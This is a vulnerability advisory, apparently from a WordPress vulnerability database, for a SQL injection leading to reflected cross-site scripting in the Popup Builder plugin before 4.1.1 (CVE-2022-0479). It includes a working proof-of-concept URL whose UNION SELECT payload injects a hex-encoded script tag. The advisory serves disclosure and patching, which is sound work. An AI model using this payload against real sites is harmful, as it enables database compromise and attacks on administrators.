Popup Builder < 4.1.1 – SQL Injection to Reflected Cross-Site Scripting | CVE 2022-0479 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the sgpb-subscription-popup-id parameter before using it in a SQL statement in the All Subscribers admin dashboard, leading to a SQL injection, which could also be used to perform Reflected Cross-Site Scripting attack against a logged in admin opening a malicious link

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=popupbuilder&page=sgpbSubscribers&sgpb-subscription-popup-id=0%29+union+all++select+1%2C0x3c696d6720737263206f6e6572726f723d616c6572742831293e%2C3%2C4%2C5%2C6+--+g

Affects Plugins

Fixed in 4.1.1

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2686454

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

0d2bbbaf-fbfd-4921-ba4e-684e2e77e816

Timeline

Publicly Published

2022-03-07 (about 3 years ago)

Added

2022-03-07 (about 3 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2021-08-22

Title

WP iCommerce <= 1.1.1 - Authenticated (contributor+) SQL Injection

Published

2024-05-30

Title

HTML5 Video Player < 2.5.27 - Unauthenticated SQLi

Published

2024-08-26

Title

Greenshift Query and Meta Addon < 3.9.2 - Authenticated (Subscriber+) SQL Injection

Published

2023-10-30

Title

Wp photo text slider 50 < 8.1 - Authenticated (Subscriber+) SQL Injection via Shortcode

Published

2021-11-22

Title

WCFM - WooCommerce Multivendor Marketplace < 3.4.12 - Unauthenticated SQL Injection